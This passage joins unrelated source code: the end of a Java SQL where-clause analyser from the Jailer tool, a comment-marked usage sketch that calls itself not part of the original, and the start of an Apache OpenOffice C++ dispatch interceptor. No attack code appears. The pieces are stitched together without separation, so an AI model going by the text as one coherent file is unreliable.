(tableName != null) { tableAlias = findTable(tableName, fromClause); } if (tableAlias == null) { throw new QueryTooComplexException(); } MDTable mdTable = fromClause.get(tableAlias); try { List<String> columns = mdTable.getColumns(false); if (columns.isEmpty()) { LogUtil.warn(new RuntimeException("Table without columns: " + mdTable.getName() + "/" + ((mdTable.getSchema() == null? 
"null" : mdTable.getSchema().getName())) + " " + sqlSelect)); } for (String c: columns) { net.sf.jailer.datamodel.Column col = findColumn(tableAlias, c, fromClause, metaDataSource); boolean isNullable = col == null || col.isNullable; col = new net.sf.jailer.datamodel.Column((unknownTableCounter[0] != 0 || fromClause.size() != 1? tableAlias + "." : "") + c, null, -1, -1); col.isNullable = isNullable; selectClause.add(col); if (unknownTableCounter[0] == 0) { String uniqueColumnAlias = findUniqueAliasOfTableColumn(c, fromClause); if (uniqueColumnAlias != null) { if (idEquals(allTableColumns.getTable().getFullyQualifiedName(), uniqueColumnAlias, false)) { if (fromClause.size() != 1) { result.addAlternativeName(col.name, c, quoting); } else { result.addAlternativeName(col.name, tableAlias, c, quoting); } } } } } } catch (SQLException e) { logger.info("error", e); throw new QueryTooComplexException(); } } @Override public void visit(AllColumns allColumns) { for (Entry<String, MDTable> e: fromClause.entrySet()) { MDTable mdTable = e.getValue(); if (mdTable == null) { throw new QueryTooComplexException(); } try { List<String> columns = mdTable.getColumns(false); if (columns.isEmpty()) { LogUtil.warn(new RuntimeException("Table without columns: " + mdTable.getName() + "/" + ((mdTable.getSchema() == null? "null" : mdTable.getSchema().getName())) + " " + sqlSelect)); } for (String c: columns) { net.sf.jailer.datamodel.Column col = findColumn(e.getKey(), c, fromClause, metaDataSource); boolean isNullable = col == null || col.isNullable; col = new net.sf.jailer.datamodel.Column((unknownTableCounter[0] != 0 || fromClause.size() != 1? e.getKey() + "." : "") + c, null, -1, -1); col.isNullable = isNullable; selectClause.add(col); if (unknownTableCounter[0] == 0) { String uniqueColumnAlias = findUniqueAliasOfTableColumn(c, fromClause); if (uniqueColumnAlias != null) { if (idEquals(e.getKey(), uniqueColumnAlias, false)) { if (fromClause.size() != 1) { result.addAlternativeName(col.name, c, quoting); } else { result.addAlternativeName(col.name, e.getKey(), c, quoting); } } } } } } catch (SQLException e2) { logger.info("error", e2); throw new QueryTooComplexException(); } } } }); } } @Override public void visit(ValuesStatement aThis) { throw new QueryTooComplexException(); } }); } }); for (int i1 = 0; i1 < selectClause.size(); ++i1) { for (int i2 = 0; i2 < selectClause.size(); ++i2) { net.sf.jailer.datamodel.Column c1 = selectClause.get(i1); net.sf.jailer.datamodel.Column c2 = selectClause.get(i2); if (c1 != null && c2 != null && c1 != c2 && c1.name != null && c2.name != null) { if (c1.name.replaceAll("\\s+", "").toLowerCase().endsWith(c2.name.replaceAll("\\s+", "").toLowerCase())) { String name = "(" + c1.name + ")"; result.addAlias(c1.name, name); net.sf.jailer.datamodel.Column newColumn = new net.sf.jailer.datamodel.Column(name, c1.type, c1.length, c1.precision); newColumn.isNullable = c1.isNullable; selectClause.set(i1, newColumn); } } } } PrimaryKey pk = new PrimaryKey(new ArrayList<net.sf.jailer.datamodel.Column>(), false); Table table = new Table(woComments.toString(), pk, false, false); table.setColumns(selectClause); result.table = table; result.cte = cte.toString(); if (result.table.getColumns().isEmpty()) { return null; } selectClause.forEach(c -> result.addAlternativeName(c.name, c.name, quoting)); return result; } catch (QueryTooComplexException e) { // ignore } catch (JSQLParserException e) { if (!warned) { LogUtil.warn(new RuntimeException(sqlSelect + ": " + e.getMessage())); warned = true; } } 
catch (Throwable t) { LogUtil.warn(t); } return null; } protected static Pair<Integer, Integer> findFragment(String fragment, String sql) { Pair<Integer, Integer> pos = null; Pattern pattern = Pattern.compile(SqlUtil.createSQLFragmentSearchPattern(fragment, false), Pattern.CASE_INSENSITIVE); Matcher matcher = pattern.matcher(sql); if (matcher.find()) { pos = new Pair<Integer, Integer>(matcher.start(), matcher.end()); if (matcher.find()) { // not unique pos = null; } } return pos; } private static LinkedHashMap<String, MDTable> analyseFromClause(Statement st, int[] unknownTableCounter, final MetaDataSource metaDataSource) { final LinkedHashMap<String, MDTable> result = new LinkedHashMap<String, MDTable>(); unknownTableCounter[0] = 0; st.accept(new StatementVisitorAdapter() { @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitor() { @Override public void visit(WithItem withItem) { } @Override public void visit(SetOperationList setOpList) { } @Override public void visit(PlainSelect plainSelect) { if (plainSelect.getFromItem() != null) { final FromItemVisitor fromItemVisitor = new FromItemVisitor() { private void unknownTable() { result.put("-unknown-" + (unknownTableCounter[0]++), null); } @Override public void visit(TableFunction tableFunction) { unknownTable(); } @Override public void visit(ValuesList valuesList) { unknownTable(); } @Override public void visit(LateralSubSelect lateralSubSelect) { unknownTable(); } @Override public void visit(SubJoin subjoin) { subjoin.getLeft().accept(this); if (subjoin.getJoinList() != null) { for (Join join: subjoin.getJoinList()) { join.getRightItem().accept(this); } } } @Override public void visit(SubSelect subSelect) { unknownTable(); } @Override public void visit(net.sf.jsqlparser.schema.Table tableName) { String schema = tableName.getSchemaName(); String name = tableName.getName(); if (tableName.getPivot() != null) { unknownTable(); } else { MDSchema mdSchema = null; if (metaDataSource.isInitialized()) { if (schema == null) { mdSchema = metaDataSource.getDefaultSchema(); } else { mdSchema = metaDataSource.find(schema); } } if (mdSchema != null) { MDTable mdTable; if (!mdSchema.isLoaded()) { mdSchema.loadTables(true, null, null, null); mdTable = null; } else { mdTable = mdSchema.find(name); } if (mdTable != null) { result.put(tableName.getAlias() != null? 
tableName.getAlias().getName() : mdTable.getName(), mdTable); } else { unknownTable(); } } } } @Override public void visit(ParenthesisFromItem parenthesisFromItem) { if (parenthesisFromItem.getFromItem() != null) { parenthesisFromItem.getFromItem().accept(this); } } }; plainSelect.getFromItem().accept(fromItemVisitor); if (plainSelect.getJoins() != null) { for (Join join: plainSelect.getJoins()) { join.getRightItem().accept(fromItemVisitor); } } } } @Override public void visit(ValuesStatement aThis) { } }); } }); return result; } private static net.sf.jailer.datamodel.Column findColumn(String alias, String columnName, LinkedHashMap<String, MDTable> fromClause, MetaDataSource metaDataSource) throws SQLException { for (boolean strict: new boolean[] { false, true }) { for (Entry<String, MDTable> e: fromClause.entrySet()) { if (alias == null || idEquals(e.getKey(), alias, strict)) { if (e.getValue() != null) { Table table = metaDataSource.toTable(e.getValue()); if (table != null) { for (net.sf.jailer.datamodel.Column column: table.getColumns()) { if (column.name != null && idEquals(column.name, columnName, strict)) { return column; } } } } } } } return null; } private static String findUniqueAliasOfTableColumn(String columnName, LinkedHashMap<String, MDTable> fromClause) throws SQLException { String alias = null; for (Entry<String, MDTable> e: fromClause.entrySet()) { if (e.getValue() != null) { try { for (String column: e.getValue().getColumns()) { if (idEquals(column, columnName, false)) { if (alias != null) { return null; } alias = e.getKey(); break; } } } catch (SQLException ex) { logger.info("error", ex); throw new QueryTooComplexException(); } } else { return null; } } return alias; } private static String findTable(String tableName, LinkedHashMap<String, MDTable> fromClause) { for (boolean strict: new boolean[] { false, true }) { for (Entry<String, MDTable> e: fromClause.entrySet()) { if (idEquals(e.getKey(), tableName, strict)) { return e.getKey(); } } } return null; } private static boolean idEquals(String a, String b, boolean strict) { if (a == null || b == null) { return false; } if (strict) { return a.equals(b); } return Quoting.normalizeIdentifier(a).equals(Quoting.normalizeIdentifier(b)); } private static ExpressionVisitor createExpressionVisitor(final boolean[] noSubexpression, final Column[] column) { return new ExpressionVisitor() { @Override public void visit(Column tableColumn) { column[0] = tableColumn; } @Override public void visit(NotExpression aThis) { noSubexpression[0] = false; } @Override public void visit(DateTimeLiteralExpression literal) { noSubexpression[0] = false; } @Override public void visit(TimeKeyExpression timeKeyExpression) { noSubexpression[0] = false; } @Override public void visit(OracleHint hint) { noSubexpression[0] = false; } @Override public void visit(RowConstructor rowConstructor) { noSubexpression[0] = false; } @Override public void visit(MySQLGroupConcat groupConcat) { noSubexpression[0] = false; } @Override public void visit(KeepExpression aexpr) { noSubexpression[0] = false; } @Override public void visit(NumericBind bind) { noSubexpression[0] = false; } @Override public void visit(UserVariable var) { noSubexpression[0] = false; } @Override public void visit(RegExpMySQLOperator regExpMySQLOperator) { noSubexpression[0] = false; } @Override public void visit(JsonOperator jsonExpr) { noSubexpression[0] = false; } @Override public void visit(JsonExpression jsonExpr) { noSubexpression[0] = false; } @Override public void visit(RegExpMatchOperator 
rexpr) { noSubexpression[0] = false; } @Override public void visit(OracleHierarchicalExpression oexpr) { noSubexpression[0] = false; } @Override public void visit(IntervalExpression iexpr) { noSubexpression[0] = false; } @Override public void visit(ExtractExpression eexpr) { noSubexpression[0] = false; } @Override public void visit(AnalyticExpression aexpr) { noSubexpression[0] = false; } @Override public void visit(Modulo modulo) { noSubexpression[0] = false; } @Override public void visit(CastExpression cast) { noSubexpression[0] = false; } @Override public void visit(BitwiseXor bitwiseXor) { noSubexpression[0] = false; } @Override public void visit(BitwiseOr bitwiseOr) { noSubexpression[0] = false; } @Override public void visit(BitwiseAnd bitwiseAnd) { noSubexpression[0] = false; } @Override public void visit(Matches matches) { noSubexpression[0] = false; } @Override public void visit(Concat concat) { noSubexpression[0] = false; } @Override public void visit(AnyComparisonExpression anyComparisonExpression) { noSubexpression[0] = false; } @Override public void visit(ExistsExpression existsExpression) { noSubexpression[0] = false; } @Override public void visit(WhenClause whenClause) { noSubexpression[0] = false; } @Override public void visit(CaseExpression caseExpression) { noSubexpression[0] = false; } @Override public void visit(SubSelect subSelect) { noSubexpression[0] = false; } @Override public void visit(NotEqualsTo notEqualsTo) { noSubexpression[0] = false; } @Override public void visit(MinorThanEquals minorThanEquals) { noSubexpression[0] = false; } @Override public void visit(MinorThan minorThan) { noSubexpression[0] = false; } @Override public void visit(LikeExpression likeExpression) { noSubexpression[0] = false; } @Override public void visit(IsNullExpression isNullExpression) { noSubexpression[0] = false; } @Override public void visit(InExpression inExpression) { noSubexpression[0] = false; } @Override public void visit(GreaterThanEquals greaterThanEquals) { noSubexpression[0] = false; } @Override public void visit(GreaterThan greaterThan) { noSubexpression[0] = false; } @Override public void visit(EqualsTo equalsTo) { noSubexpression[0] = false; } @Override public void visit(Between between) { noSubexpression[0] = false; } @Override public void visit(OrExpression orExpression) { noSubexpression[0] = false; } @Override public void visit(AndExpression andExpression) { noSubexpression[0] = false; } @Override public void visit(Subtraction subtraction) { noSubexpression[0] = false; } @Override public void visit(Multiplication multiplication) { noSubexpression[0] = false; } @Override public void visit(Division division) { noSubexpression[0] = false; } @Override public void visit(Addition addition) { noSubexpression[0] = false; } @Override public void visit(StringValue stringValue) { noSubexpression[0] = false; } @Override public void visit(Parenthesis parenthesis) { noSubexpression[0] = false; } @Override public void visit(TimestampValue timestampValue) { noSubexpression[0] = false; } @Override public void visit(TimeValue timeValue) { noSubexpression[0] = false; } @Override public void visit(DateValue dateValue) { noSubexpression[0] = false; } @Override public void visit(HexValue hexValue) { noSubexpression[0] = false; } @Override public void visit(LongValue longValue) { noSubexpression[0] = false; } @Override public void visit(DoubleValue doubleValue) { noSubexpression[0] = false; } @Override public void visit(JdbcNamedParameter jdbcNamedParameter) { noSubexpression[0] = false; } 
@Override public void visit(JdbcParameter jdbcParameter) { noSubexpression[0] = false; } @Override public void visit(SignedExpression signedExpression) { noSubexpression[0] = false; } @Override public void visit(Function function) { noSubexpression[0] = false; } @Override public void visit(NullValue nullValue) { noSubexpression[0] = false; } @Override public void visit(BitwiseRightShift aThis) { noSubexpression[0] = false; } @Override public void visit(BitwiseLeftShift aThis) { noSubexpression[0] = false; } @Override public void visit(ValueListExpression valueList) { noSubexpression[0] = false; } @Override public void visit(IntegerDivision division) { noSubexpression[0] = false; } @Override public void visit(FullTextSearch fullTextSearch) { noSubexpression[0] = false; } @Override public void visit(IsBooleanExpression isBooleanExpression) { noSubexpression[0] = false; } @Override public void visit(NextValExpression aThis) { noSubexpression[0] = false; } @Override public void visit(CollateExpression aThis) { noSubexpression[0] = false; } @Override public void visit(SimilarToExpression aThis) { noSubexpression[0] = false; } @Override public void visit(ArrayExpression aThis) { noSubexpression[0] = false; } @Override public void visit(XorExpression orExpression) { noSubexpression[0] = false; } @Override public void visit(RowGetExpression rowGetExpression) { noSubexpression[0] = false; } @Override public void visit(ArrayConstructor aThis) { noSubexpression[0] = false; } @Override public void visit(VariableAssignment aThis) { noSubexpression[0] = false; } @Override public void visit(XMLSerializeExpr aThis) { noSubexpression[0] = false; } @Override public void visit(TimezoneExpression aThis) { noSubexpression[0] = false; } @Override public void visit(JsonAggregateFunction aThis) { noSubexpression[0] = false; } @Override public void visit(JsonFunction aThis) { noSubexpression[0] = false; } @Override public void visit(ConnectByRootOperator aThis) { noSubexpression[0] = false; } @Override public void visit(OracleNamedFunctionParameter aThis) { noSubexpression[0] = false; } }; } private static class QueryTooComplexException extends RuntimeException { } private static class PExpressionVisitorAdapter implements ExpressionVisitor { final Pattern exprPattern; final Pattern valuePattern; final String sql; Pair<Integer, Integer> result; final StringBuilder left = new StringBuilder(); public PExpressionVisitorAdapter(Pattern exprPattern, String sql) { this.exprPattern = exprPattern; this.sql = sql; valuePattern = Pattern.compile(WhereConditionEditorPanel.VALUE_REGEX, Pattern.CASE_INSENSITIVE|Pattern.DOTALL); } @Override public void visit(NotExpression aThis) { check(aThis); visitAny(aThis); } @Override public void visit(NotEqualsTo notEqualsTo) { check(notEqualsTo); visitAny(notEqualsTo); } @Override public void visit(MinorThanEquals minorThanEquals) { check(minorThanEquals); visitAny(minorThanEquals); } @Override public void visit(MinorThan minorThan) { check(minorThan); visitAny(minorThan); } @Override public void visit(LikeExpression likeExpression) { check(likeExpression); visitAny(likeExpression); } @Override public void visit(IsNullExpression isNullExpression) { check(isNullExpression); check(isNullExpression.getLeftExpression()); visitAny(isNullExpression); } @Override public void visit(GreaterThanEquals greaterThanEquals) { check(greaterThanEquals); visitAny(greaterThanEquals); } @Override public void visit(GreaterThan greaterThan) { check(greaterThan); visitAny(greaterThan); } @Override public void 
visit(EqualsTo equalsTo) { check(equalsTo); visitAny(equalsTo); } @Override public void visit(XorExpression orExpression) { check(orExpression); visitAny(orExpression); } @Override public void visit(OrExpression orExpression) { check(orExpression); visitAny(orExpression); } @Override public void visit(AndExpression andExpression) { check(andExpression); andExpression.getLeftExpression().accept(this); andExpression.getRightExpression().accept(this); } @Override public void visit(Parenthesis parenthesis) { check(parenthesis); parenthesis.getExpression().accept(this); } private void check(Object node) { if (result == null) { Matcher matcher = exprPattern.matcher(node.toString()); if (matcher.matches()) { int cnt = 1; matcher = exprPattern.matcher(left); while (matcher.find()) { ++cnt; } result = new Pair<Integer, Integer>(cnt, left.length()); } if (node instanceof ComparisonOperator) { Expression rightExpression = ((ComparisonOperator) node).getRightExpression(); if (rightExpression != null && !valuePattern.matcher(rightExpression.toString()).matches()) { invalidComparisons.add(node); result = null; } else { check(((ComparisonOperator) node).getLeftExpression()); } } else if (node instanceof LikeExpression) { Expression rightExpression = ((LikeExpression) node).getRightExpression(); if (rightExpression != null && !valuePattern.matcher(rightExpression.toString()).matches()) { invalidComparisons.add(node); result = null; } else { check(((LikeExpression) node).getLeftExpression()); } } } } private Set<Object> invalidComparisons = new HashSet<Object>(); private void visitAny(Object o) { if (invalidComparisons.contains(o)) { left.append("1=1"); } else if (!(o instanceof LikeExpression) && (o instanceof ASTNodeAccess && ((ASTNodeAccess) o).getASTNode() != null)) { SimpleNode node = ((ASTNodeAccess) o).getASTNode(); try { left.append(sql.substring(node.jjtGetFirstToken().absoluteBegin - 1, node.jjtGetLastToken().absoluteEnd - 1)); } catch (Exception e) { left.append(o.toString()); } } else { left.append(o.toString()); } left.append(" "); } @Override public void visit(BitwiseRightShift aThis) { visitAny(aThis); } @Override public void visit(BitwiseLeftShift aThis) { visitAny(aThis); } @Override public void visit(NullValue nullValue) { visitAny(nullValue); } @Override public void visit(Function function) { visitAny(function); } @Override public void visit(SignedExpression signedExpression) { visitAny(signedExpression); } @Override public void visit(JdbcParameter jdbcParameter) { visitAny(jdbcParameter); } @Override public void visit(JdbcNamedParameter jdbcNamedParameter) { visitAny(jdbcNamedParameter); } @Override public void visit(DoubleValue doubleValue) { visitAny(doubleValue); } @Override public void visit(LongValue longValue) { visitAny(longValue); } @Override public void visit(HexValue hexValue) { visitAny(hexValue); } @Override public void visit(DateValue dateValue) { visitAny(dateValue); } @Override public void visit(TimeValue timeValue) { visitAny(timeValue); } @Override public void visit(TimestampValue timestampValue) { visitAny(timestampValue); } @Override public void visit(StringValue stringValue) { visitAny(stringValue); } @Override public void visit(Addition addition) { visitAny(addition); } @Override public void visit(Division division) { visitAny(division); } @Override public void visit(IntegerDivision division) { visitAny(division); } @Override public void visit(Multiplication multiplication) { visitAny(multiplication); } @Override public void visit(Subtraction subtraction) { 
visitAny(subtraction); } @Override public void visit(Between between) { visitAny(between); } @Override public void visit(InExpression inExpression) { visitAny(inExpression); } @Override public void visit(FullTextSearch fullTextSearch) { visitAny(fullTextSearch); } @Override public void visit(IsBooleanExpression isBooleanExpression) { visitAny(isBooleanExpression); } @Override public void visit(Column tableColumn) { visitAny(tableColumn); } @Override public void visit(SubSelect subSelect) { visitAny(subSelect); } @Override public void visit(CaseExpression caseExpression) { visitAny(caseExpression); } @Override public void visit(WhenClause whenClause) { visitAny(whenClause); } @Override public void visit(ExistsExpression existsExpression) { visitAny(existsExpression); } @Override public void visit(AnyComparisonExpression anyComparisonExpression) { visitAny(anyComparisonExpression); } @Override public void visit(Concat concat) { visitAny(concat); } @Override public void visit(Matches matches) { visitAny(matches); } @Override public void visit(BitwiseAnd bitwiseAnd) { visitAny(bitwiseAnd); } @Override public void visit(BitwiseOr bitwiseOr) { visitAny(bitwiseOr); } @Override public void visit(BitwiseXor bitwiseXor) { visitAny(bitwiseXor); } @Override public void visit(CastExpression cast) { visitAny(cast); } @Override public void visit(Modulo modulo) { visitAny(modulo); } @Override public void visit(AnalyticExpression aexpr) { visitAny(aexpr); } @Override public void visit(ExtractExpression eexpr) { visitAny(eexpr); } @Override public void visit(IntervalExpression iexpr) { visitAny(iexpr); } @Override public void visit(OracleHierarchicalExpression oexpr) { visitAny(oexpr); } @Override public void visit(RegExpMatchOperator rexpr) { visitAny(rexpr); } @Override public void visit(JsonExpression jsonExpr) { visitAny(jsonExpr); } @Override public void visit(JsonOperator jsonExpr) { visitAny(jsonExpr); } @Override public void visit(RegExpMySQLOperator regExpMySQLOperator) { visitAny(regExpMySQLOperator); } @Override public void visit(UserVariable var) { visitAny(var); } @Override public void visit(NumericBind bind) { visitAny(bind); } @Override public void visit(KeepExpression aexpr) { visitAny(aexpr); } @Override public void visit(MySQLGroupConcat groupConcat) { visitAny(groupConcat); } @Override public void visit(ValueListExpression valueList) { visitAny(valueList); } @Override public void visit(RowConstructor rowConstructor) { visitAny(rowConstructor); } @Override public void visit(RowGetExpression rowGetExpression) { visitAny(rowGetExpression); } @Override public void visit(OracleHint hint) { visitAny(hint); } @Override public void visit(TimeKeyExpression timeKeyExpression) { visitAny(timeKeyExpression); } @Override public void visit(DateTimeLiteralExpression literal) { visitAny(literal); } @Override public void visit(NextValExpression aThis) { visitAny(aThis); } @Override public void visit(CollateExpression aThis) { visitAny(aThis); } @Override public void visit(SimilarToExpression aThis) { visitAny(aThis); } @Override public void visit(ArrayExpression aThis) { visitAny(aThis); } @Override public void visit(ArrayConstructor aThis) { visitAny(aThis); } @Override public void visit(VariableAssignment aThis) { visitAny(aThis); } @Override public void visit(XMLSerializeExpr aThis) { visitAny(aThis); } @Override public void visit(TimezoneExpression aThis) { visitAny(aThis); } @Override public void visit(JsonAggregateFunction aThis) { visitAny(aThis); } @Override public void visit(JsonFunction aThis) { 
visitAny(aThis); } @Override public void visit(ConnectByRootOperator aThis) { visitAny(aThis); } @Override public void visit(OracleNamedFunctionParameter aThis) { visitAny(aThis); } }; public static Pair<Integer, Integer> getPositivePosition(String expr, Set<String> alternativeNames, String condition) { if (expr == null) { return null; } String pattern; if (alternativeNames == null) { pattern = SqlUtil.createSQLFragmentSearchPattern(expr, false); } else { pattern = "(?:" + alternativeNames.stream().map(aName -> "(?:" + SqlUtil.createSQLFragmentSearchPattern(aName, false) + ")").collect(Collectors.joining("|")) + ")"; } Pattern pat = Pattern.compile(pattern, Pattern.CASE_INSENSITIVE|Pattern.DOTALL); return getPositivePosition(pat, condition); } public static Pair<Integer, Integer> getPositivePosition(Pattern exprPattern, String condition) { if (condition.isEmpty()) { return null; } net.sf.jsqlparser.statement.Statement st; try { String sql = "Select * From T Where " + condition; st = JSqlParserUtil.parse(sql, 2); PExpressionVisitorAdapter pe = new PExpressionVisitorAdapter(exprPattern, sql); st.accept(new StatementVisitorAdapter() { @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitorAdapter() { @Override public void visit(PlainSelect plainSelect) { plainSelect.getWhere().accept(pe); } }); } }); if (pe.result == null) { Matcher matcher = exprPattern.matcher(condition); if (matcher.find()) { pe.result = new Pair<Integer, Integer>(0, 0); } } return pe.result; } catch (/*JSQLParser*/ Exception e) { return null; } } public static boolean isPositiveExpression(String condition) { if (condition.isEmpty()) { return true; } net.sf.jsqlparser.statement.Statement st; try { st = JSqlParserUtil.parse("Select * From T Where " + condition, 2); List<Boolean> result = new ArrayList<>(); st.accept(new StatementVisitorAdapter() { @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitorAdapter() { @Override public void visit(PlainSelect plainSelect) { Expression wc = plainSelect.getWhere(); result.add(!( wc instanceof OrExpression || wc instanceof XorExpression)); } }); } }); if (!result.isEmpty()) { return result.get(0); } return false; } catch (/*JSQLParser*/ Exception e) { return false; } } private static boolean warned = false; public static void main(String args[]) { System.out.println(getPositivePosition("A.rzMandant", null, "A.ObjectId = 'dcc9802:1211af96d82:-7d45'\r\n" + " and A . rzMandant = 'ABIT'")); System.out.println(getPositivePosition("rzMandant", null, "A.ObjectId = 'dcc9802:1211af96d82:-7d45'\r\n" + " and A.rzMandant = 'ABIT'")); System.out.println(getPositivePosition("comm", null, "comm=1 or Empno=7902 and deptno=7902 and (comm is not null and boss is null)")); System.out.println(getPositivePosition("(x + 1)", null, "x+1=0")); System.out.println(getPositivePosition("x", null, "not x is not null and x=0")); System.out.println(getPositivePosition("x", null, "x=0")); System.out.println(getPositivePosition("x", null, "not x=0")); System.out.println(getPositivePosition("x", null, "x is null")); System.out.println(getPositivePosition("(x + 1)", null, "x+1=0 or y=0")); System.out.println(getPositivePosition("x", null, "y=0")); System.out.println(getPositivePosition("x", null, "(x=0) and (not 2 * x = 0)")); System.out.println(getPositivePosition("x", null, "(x=0) or (not 2 * x = 0)")); } }
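/*
 * Usage sketch (illustrative only, not part of the original file): shows how
 * WCTypeAnalyser.getType might be driven for a simple query. The metaDataSource
 * and quoting arguments are assumed to come from an open database session
 * elsewhere in the UI; the helper class and method names below are hypothetical.
 */
class WCTypeAnalyserUsageSketch {

	static String editableCondition(String query, MetaDataSource metaDataSource, Quoting quoting) {
		WCTypeAnalyser.Result result = WCTypeAnalyser.getType(query, metaDataSource, quoting);
		if (result == null || !result.hasCondition) {
			// query was too complex to analyse, or it has no where/having clause
			return null;
		}
		// conditionStart/conditionEnd index into the original query text
		return result.originalQuery.substring(result.conditionStart, result.conditionEnd);
	}
}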
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ // MARKER(update_precomp.py): autogen include statement, do not remove #include "precompiled_sw.hxx" #include <vcl/svapp.hxx> #include <sfx2/viewfrm.hxx> #include <sfx2/dispatch.hxx> #include <svx/dataaccessdescriptor.hxx> #include <unodispatch.hxx> #include <unobaseclass.hxx> #include <view.hxx> #include <cmdid.h> #include "wrtsh.hxx" #include "dbmgr.hxx" using namespace ::com::sun::star; using namespace rtl; using namespace vos; const char* cURLStart = ".uno:DataSourceBrowser/"; const char* cURLFormLetter = ".uno:DataSourceBrowser/FormLetter"; const char* cURLInsertContent = ".uno:DataSourceBrowser/InsertContent";//data into fields const char* cURLInsertColumns = ".uno:DataSourceBrowser/InsertColumns";//data into text const char* cURLDocumentDataSource = ".uno:DataSourceBrowser/DocumentDataSource";//current data source of the document const sal_Char* cInternalDBChangeNotification = ".uno::Writer/DataSourceChanged"; /*-- 07.11.00 13:25:51--------------------------------------------------- -----------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::SwXDispatchProviderInterceptor(SwView& rVw) : m_pView(&rVw) { uno::Reference< frame::XFrame> xUnoFrame = m_pView->GetViewFrame()->GetFrame().GetFrameInterface(); m_xIntercepted = uno::Reference< frame::XDispatchProviderInterception>(xUnoFrame, uno::UNO_QUERY); if(m_xIntercepted.is()) { m_refCount++; m_xIntercepted->registerDispatchProviderInterceptor((frame::XDispatchProviderInterceptor*)this); // this should make us the top-level dispatch-provider for the component, via a call to our // setDispatchProvider we should have got an fallback for requests we (i.e. our master) cannot fulfill uno::Reference< lang::XComponent> xInterceptedComponent(m_xIntercepted, uno::UNO_QUERY); if (xInterceptedComponent.is()) xInterceptedComponent->addEventListener((lang::XEventListener*)this); m_refCount--; } } /*-- 07.11.00 13:25:51--------------------------------------------------- -----------------------------------------------------------------------*/ SwXDispatchProviderInterceptor::~SwXDispatchProviderInterceptor() { } /*-- 07.11.00 13:25:51--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Reference< frame::XDispatch > SwXDispatchProviderInterceptor::queryDispatch( const util::URL& aURL, const OUString& aTargetFrameName, sal_Int32 nSearchFlags ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); uno::Reference< frame::XDispatch> xResult; // create some dispatch ... 
if(m_pView && !aURL.Complete.compareToAscii(cURLStart, 23)) { if(!aURL.Complete.compareToAscii(cURLFormLetter) || !aURL.Complete.compareToAscii(cURLInsertContent) || !aURL.Complete.compareToAscii(cURLInsertColumns)|| !aURL.Complete.compareToAscii(cURLDocumentDataSource)) { if(!m_xDispatch.is()) m_xDispatch = new SwXDispatch(*m_pView); xResult = m_xDispatch; } } // ask our slave provider if (!xResult.is() && m_xSlaveDispatcher.is()) xResult = m_xSlaveDispatcher->queryDispatch(aURL, aTargetFrameName, nSearchFlags); return xResult; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Sequence< uno::Reference< frame::XDispatch > > SwXDispatchProviderInterceptor::queryDispatches( const uno::Sequence< frame::DispatchDescriptor >& aDescripts ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); uno::Sequence< uno::Reference< frame::XDispatch> > aReturn(aDescripts.getLength()); uno::Reference< frame::XDispatch>* pReturn = aReturn.getArray(); const frame::DispatchDescriptor* pDescripts = aDescripts.getConstArray(); for (sal_Int16 i=0; i<aDescripts.getLength(); ++i, ++pReturn, ++pDescripts) { *pReturn = queryDispatch(pDescripts->FeatureURL, pDescripts->FrameName, pDescripts->SearchFlags); } return aReturn; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Reference< frame::XDispatchProvider > SwXDispatchProviderInterceptor::getSlaveDispatchProvider( ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); return m_xSlaveDispatcher; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::setSlaveDispatchProvider( const uno::Reference< frame::XDispatchProvider >& xNewDispatchProvider ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); m_xSlaveDispatcher = xNewDispatchProvider; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ uno::Reference< frame::XDispatchProvider > SwXDispatchProviderInterceptor::getMasterDispatchProvider( ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); return m_xMasterDispatcher; } /*-- 07.11.00 13:25:52--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::setMasterDispatchProvider( const uno::Reference< frame::XDispatchProvider >& xNewSupplier ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); m_xMasterDispatcher = xNewSupplier; } /*-- 07.11.00 13:25:53--------------------------------------------------- -----------------------------------------------------------------------*/ void SwXDispatchProviderInterceptor::disposing( const lang::EventObject& ) throw(uno::RuntimeException) { DispatchMutexLock_Impl aLock(*this); if (m_xIntercepted.is()) { m_xIntercepted->releaseDispatchProviderInterceptor((frame::XDispatchProviderInterceptor*)this); uno::Reference< lang::XComponent> xInterceptedComponent(m_xIntercepted, uno::UNO_QUERY); if (xInterceptedComponent.is()) xInterceptedComponent->removeEventListener((lang::XEventListener*)this); m_xDispatch = 0; } m_xIntercepted = NULL; } /* -----------------------------01.10.2001 14:31------------------------------ 
